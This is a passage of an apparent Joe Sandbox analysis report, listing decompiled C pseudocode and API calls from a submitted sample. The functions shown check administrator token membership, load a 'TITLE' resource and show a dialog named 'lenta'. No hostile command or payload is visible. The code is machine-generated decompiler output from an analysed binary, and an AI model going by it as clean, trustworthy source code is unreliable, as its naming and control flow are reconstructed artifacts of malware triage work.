                                                                                                                                                                                                                                            				if(E00A017EE( &_v20) != 0) {
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                                            						 *0xa08128 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                            					CloseHandle(_v28);
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                                                                                            					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_pop(_t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                                            						LocalFree(_t52);
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if( *_t52 <= 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							FreeSid(_v32);
                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                            						_t50 = _t15;
                                                                                                                                                                                                                                            						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                            							_t45 = _t45 + 1;
                                                                                                                                                                                                                                            							_t50 = _t50 + 8;
                                                                                                                                                                                                                                            							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa08128 = 1;
                                                                                                                                                                                                                                            						_v20 = 1;
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A017EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A018DD), ref: 00A0181A
                                                                                                                                                                                                                                              • Part of subcall function 00A017EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A0182C
                                                                                                                                                                                                                                              • Part of subcall function 00A017EE: AllocateAndInitializeSid.ADVAPI32(00A018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A018DD), ref: 00A01855
                                                                                                                                                                                                                                              • Part of subcall function 00A017EE: FreeSid.ADVAPI32(?,?,?,?,00A018DD), ref: 00A01883
                                                                                                                                                                                                                                              • Part of subcall function 00A017EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A018DD), ref: 00A0188A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A018EB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00A018F2
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A0190A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00A01918
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A0192C
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A01944
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A01964
                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 00A0197A
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 00A0199C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A019A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A019AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                            • Opcode ID: cad11e3810083deebf7d21496317f410d3e5fcd2ebe1750a76d7a9a547d1914e
                                                                                                                                                                                                                                            • Instruction ID: bc0d88b9c437f26ae8f6056958f17dda9c105a8aef9b9c71d61594154b5d7c1d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cad11e3810083deebf7d21496317f410d3e5fcd2ebe1750a76d7a9a547d1914e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4311871A0020DABDB20DFE5EC98AEFBBB8FF18744F504429E545D2190DB349906CB65
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A0468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                            				_t11 = __edx;
                                                                                                                                                                                                                                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                            				_t16 = _t4;
                                                                                                                                                                                                                                            				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                            					FreeResource(_t15);
                                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: TITLE$lenta
                                                                                                                                                                                                                                            • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                            • Opcode ID: b407947b781ac5804f494e663f521869278c95df0a06d443959dd60a21e7f71c
                                                                                                                                                                                                                                            • Instruction ID: 23ea44642f0d6e35706a53d05b841ce6fb76912a35cd3b57fa5402b57b046334
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b407947b781ac5804f494e663f521869278c95df0a06d443959dd60a21e7f71c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF01D6B224030C7BE3105BE5BC4CF6B3E2CEBDAB51F040414FB4986190D9A2885383A2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                            			E00A017EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                            					_v20 = _t20;
                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                            						 *_t37 = 0;
                                                                                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                                                                                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                            							_t37 = _t39;
                                                                                                                                                                                                                                            							 *0xa0a288(0, _v24, _v28);
                                                                                                                                                                                                                                            							_v20();
                                                                                                                                                                                                                                            							if(_t39 != _t39) {
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							FreeSid(_v24);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t36);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A018DD), ref: 00A0181A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A0182C
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(00A018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A018DD), ref: 00A01855
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,00A018DD), ref: 00A01883
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A018DD), ref: 00A0188A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                            • Opcode ID: d8333fba05d0b01ce1bd51141741562606f87eea4fdac80a48c18214b73cfab1
                                                                                                                                                                                                                                            • Instruction ID: 6884d5e0bbe7fd6fc502fb02298b337865fc09585465aa0bd82c99d542612511
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8333fba05d0b01ce1bd51141741562606f87eea4fdac80a48c18214b73cfab1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82116371E0030DABDB14DFE4EC49ABEBB78EF48705F104569FA06E2290DA709D068B95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A03450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                                            					EndDialog(_a4, 2);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                            					E00A043D0(_t24, _t12);
                                                                                                                                                                                                                                            					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t24, 0x838,  *0xa09404);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t11 == 1) {
                                                                                                                                                                                                                                            					_t22 = _a12;
                                                                                                                                                                                                                                            					if(_t22 < 6) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 <= 7) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 != 0x839) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa091dc = 1;
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03496
                                                                                                                                                                                                                                            0x00a03484
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03486
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03486
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A03490
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A0349A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A034B2
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 00A034C4
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00A034CB
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 00A034D8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                            • Opcode ID: fcaac8b028d31d620eaa4214b0c2324f915853ceaa5ce38700a8930e85901a58
                                                                                                                                                                                                                                            • Instruction ID: 23e183995d20e2101aae1fe876d8dd70cfb35e7a2bff9786194fd645cc4b7066
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcaac8b028d31d620eaa4214b0c2324f915853ceaa5ce38700a8930e85901a58
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2001B53224021CABDB169FA5FC0C96E3A68EB19702F004110F9468E5E0C7728F43C785
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A02AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                            				CHAR* _t59;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t60 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t64 = __ecx;
                                                                                                                                                                                                                                            				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                            					GetModuleFileNameA( *0xa09a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_t17 =  *_t64;
                                                                                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                            						 *_t65 =  *_t64;
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t65[1] = _t64[1];
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                            							L19:
                                                                                                                                                                                                                                            							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                            								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                            									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A01680(_t65, E00A017C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            									_t52 = _t65;
                                                                                                                                                                                                                                            									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                            									_t60 = _t14;
                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                            										_t32 =  *_t52;
                                                                                                                                                                                                                                            										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                            									} while (_t32 != 0);
                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								E00A065E8( &_v268);
                                                                                                                                                                                                                                            								_t55 =  &_v268;
                                                                                                                                                                                                                                            								_t62 = _t55 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t34 =  *_t55;
                                                                                                                                                                                                                                            									_t55 = _t55 + 1;
                                                                                                                                                                                                                                            								} while (_t34 != 0);
                                                                                                                                                                                                                                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                            									 *_t38 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								E00A01680(_t65, E00A017C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            								_t59 = _t65;
                                                                                                                                                                                                                                            								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                            								_t60 = _t12;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t42 =  *_t59;
                                                                                                                                                                                                                                            									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                            								} while (_t42 != 0);
                                                                                                                                                                                                                                            								L17:
                                                                                                                                                                                                                                            								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *_t65 = _t17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A02AE6
                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A02AF2
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00A02B12
                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 00A02B1E
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 00A02B55
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00A02BD4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                            • Opcode ID: 233c43f49ca45b9e333a8c837599d515cc9d099dd2e95baeb9162b80c8c6e1d1
                                                                                                                                                                                                                                            • Instruction ID: 84211d57a0989321301ed5017e7f3666f89f51c4e270b5a1c4c9b86dbd35ee7b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 233c43f49ca45b9e333a8c837599d515cc9d099dd2e95baeb9162b80c8c6e1d1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B441213420434D9EDB159F30AC18BFD7BA99F57300F14419AE8C287282DB358E87CBA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A043D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t67;
                                                                                                                                                                                                                                            				struct HWND__* _t68;
                                                                                                                                                                                                                                            				struct HDC__* _t69;
                                                                                                                                                                                                                                            				int _t72;
                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                                                                                            				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                            				_t53 = _v40.bottom - _v40.top;
